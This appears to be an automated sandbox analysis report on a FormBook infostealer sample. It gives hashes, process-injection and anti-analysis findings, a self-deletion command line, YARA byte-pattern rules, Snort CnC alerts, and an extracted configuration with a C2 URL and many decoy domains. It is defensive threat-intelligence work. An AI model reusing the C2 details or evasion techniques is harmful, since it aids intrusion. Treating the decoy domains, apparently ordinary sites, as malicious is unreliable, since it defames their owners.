Play interactive tour

Edit tour

Analysis Report w73FtMA4ZTl9NFm.exe

Overview

General Information

Sample Name:	w73FtMA4ZTl9NFm.exe
Analysis ID:	403703
MD5:	ff44bfe6955f4d11f915b4a0b818fc7c
SHA1:	3e094caff011346ad02aeafcb5769a519cf10dc0
SHA256:	929fd55e632471f4f35295e574c6814a3de9662398b7a606e352ecba9c52de7e
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: CMSTP Execution Process Creation

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

w73FtMA4ZTl9NFm.exe (PID: 3764 cmdline: 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe' MD5: FF44BFE6955F4D11F915B4A0B818FC7C)

w73FtMA4ZTl9NFm.exe (PID: 1168 cmdline: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe MD5: FF44BFE6955F4D11F915B4A0B818FC7C)

explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmstp.exe (PID: 6400 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)

cmd.exe (PID: 6804 cmdline: /c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.naiping8.com/blm/"], "decoy": ["basilaws.com", "laesses.com", "isematsudai.com", "cafperfect.com", "listocalistoanimation.com", "bikesofthefuture.com", "sweette.com", "instagramhelpsnow.com", "wuxians.com", "canadianpayday.loans", "tiklaulan.xyz", "marketingbuddhi.com", "centrocaninopochs.com", "doodletrends.com", "praiship.com", "alghuta.com", "kompramania.com", "thenewdawncompany.com", "shopthegoodbar.com", "emergencyuavsolutions.com", "mayratienecasas.com", "gitaffiliate.com", "jdanielfit.com", "raisingarrowsbirthservices.com", "shirleyvansteenis.com", "jrlsports.com", "untiedpockets.com", "dingdongpaw.com", "skytrustconstruction.com", "shainamgmtsolns.com", "findinkjams.com", "erisedu.com", "marikell.com", "nelivo.com", "nyatigroupera.net", "herbyvet.com", "satviksumi.com", "earthnetic.com", "coronamimos.com", "neurologistaandreialamberti.com", "tom-kiesel.com", "creativegrowthllc.com", "unitrackerindo.com", "bgetaway.com", "humanmarijuana.com", "somuch2dohere.com", "gpt4every.com", "hunandanei.com", "honu360vr.com", "abn-co-host-listing-46731.xyz", "sitewebinfo.com", "iqiongtian.com", "evolvecommpr.com", "4980061061670012.xyz", "checkoutmyimages.com", "shifamedico.com", "tonygwynnclassic.com", "shopalndrinks.com", "nawabebiryanis.com", "productionlads.com", "zhjuku.com", "hbchuangjie.com", "fleurdelyshospitality.net", "tiffanybluandyou.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1db390:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1db5fa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2079b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x207c1a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1e711d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21373d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1e6c09:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x213229:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1e721f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x21383f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1e7397:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2139b7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1dc012:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x208632:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1e5e84:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2124a4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dcd0b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x20932b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ecdbf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2193df:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1eddc2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1e9ea1:$sqlite3step: 68 34 1C 7B E1 0x1e9fb4:$sqlite3step: 68 34 1C 7B E1 0x2164c1:$sqlite3step: 68 34 1C 7B E1 0x2165d4:$sqlite3step: 68 34 1C 7B E1 0x1e9ed0:$sqlite3text: 68 38 2A 90 C5 0x1e9ff5:$sqlite3text: 68 38 2A 90 C5 0x2164f0:$sqlite3text: 68 38 2A 90 C5 0x216615:$sqlite3text: 68 38 2A 90 C5 0x1e9ee3:$sqlite3blob: 68 53 D8 7F 8C 0x1ea00b:$sqlite3blob: 68 53 D8 7F 8C 0x216503:$sqlite3blob: 68 53 D8 7F 8C 0x21662b:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: w73FtMA4ZTl9NFm.exe PID: 3764	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C
1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x13cd98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13d002:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1693b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x169622:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x175145:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x148611:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x174c31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x148c27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x175247:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148d9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1753bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13da1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16a03a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14788c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x173eac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13e713:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x16ad33:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x14e7c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x17ade7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14f7ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x14b8a9:$sqlite3step: 68 34 1C 7B E1 0x14b9bc:$sqlite3step: 68 34 1C 7B E1 0x177ec9:$sqlite3step: 68 34 1C 7B E1 0x177fdc:$sqlite3step: 68 34 1C 7B E1 0x14b8d8:$sqlite3text: 68 38 2A 90 C5 0x14b9fd:$sqlite3text: 68 38 2A 90 C5 0x177ef8:$sqlite3text: 68 38 2A 90 C5 0x17801d:$sqlite3text: 68 38 2A 90 C5 0x14b8eb:$sqlite3blob: 68 53 D8 7F 8C 0x14ba13:$sqlite3blob: 68 53 D8 7F 8C 0x177f0b:$sqlite3blob: 68 53 D8 7F 8C 0x178033:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 4 entries

Sigma Overview

System Summary:

Sigma detected: CMSTP Execution Process Creation

Show sources

Source: Process started

Author: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe', CommandLine: /c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 6400, ProcessCommandLine: /c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe', ProcessId: 6804

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe, ParentImage: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe, ParentProcessId: 1168, ProcessCommandLine: , ProcessId: 3292

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.naiping8.com/blm/"], "decoy": ["basilaws.com", "laesses.com", "isematsudai.com", "cafperfect.com", "listocalistoanimation.com", "bikesofthefuture.com", "sweette.com", "instagramhelpsnow.com", "wuxians.com", "canadianpayday.loans", "tiklaulan.xyz", "marketingbuddhi.com", "centrocaninopochs.com", "doodletrends.com", "praiship.com", "alghuta.com", "kompramania.com", "thenewdawncompany.com", "shopthegoodbar.com", "emergencyuavsolutions.com", "mayratienecasas.com", "gitaffiliate.com", "jdanielfit.com", "raisingarrowsbirthservices.com", "shirleyvansteenis.com", "jrlsports.com", "untiedpockets.com", "dingdongpaw.com", "skytrustconstruction.com", "shainamgmtsolns.com", "findinkjams.com", "erisedu.com", "marikell.com", "nelivo.com", "nyatigroupera.net", "herbyvet.com", "satviksumi.com", "earthnetic.com", "coronamimos.com", "neurologistaandreialamberti.com", "tom-kiesel.com", "creativegrowthllc.com", "unitrackerindo.com", "bgetaway.com", "humanmarijuana.com", "somuch2dohere.com", "gpt4every.com", "hunandanei.com", "honu360vr.com", "abn-co-host-listing-46731.xyz", "sitewebinfo.com", "iqiongtian.com", "evolvecommpr.com", "4980061061670012.xyz", "checkoutmyimages.com", "shifamedico.com", "tonygwynnclassic.com", "shopalndrinks.com", "nawabebiryanis.com", "productionlads.com", "zhjuku.com", "hbchuangjie.com", "fleurdelyshospitality.net", "tiffanybluandyou.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: w73FtMA4ZTl9NFm.exe	Virustotal: Detection: 30%			Perma Link
Source: w73FtMA4ZTl9NFm.exe	ReversingLabs: Detection: 44%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE

Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: w73FtMA4ZTl9NFm.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: w73FtMA4ZTl9NFm.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmstp.pdbGCTL source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.288143631.0000000001910000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.287846325.00000000016BF000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.287846325.00000000016BF000.00000040.00000001.sdmp, cmstp.exe
Source:	Binary string: cmstp.pdb source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.288143631.0000000001910000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	1_2_0C1482B8
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	1_2_0C1482B3
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	1_2_0C149390
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	1_2_0C149381
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	1_2_0C1483E4
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 4x nop then pop edi	3_2_00416C8C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop edi	7_2_00696C8C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 64.190.62.111:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 64.190.62.111:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 64.190.62.111:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.naiping8.com/blm/

Source: global traffic

